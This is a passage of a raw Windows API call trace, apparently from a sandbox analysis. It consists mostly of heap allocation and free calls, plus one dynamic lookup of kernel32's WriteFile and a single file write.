HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0184.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0184.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0184.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0184.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0184.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0184.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.533] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0184.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0184.533] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0184.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0184.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0184.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0184.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1900 [0184.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0184.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0184.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0184.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0184.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0184.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0184.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0184.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0184.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0184.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0184.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0184.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0184.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0184.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0184.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0184.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0184.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0184.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0184.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0184.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0184.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0184.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0184.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0184.536] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0184.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0184.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0184.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0184.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0184.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0184.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0184.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0184.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0184.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0184.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0184.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.539] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.540] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0184.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba120, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0184.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.540] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0184.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0184.541] WriteFile (in: hFile=0x120, lpBuffer=0x8fff00*, nNumberOfBytesToWrite=0x1bd9, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x8fff00*, lpNumberOfBytesWritten=0x87eae0*=0x1bd9, lpOverlapped=0x0) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: 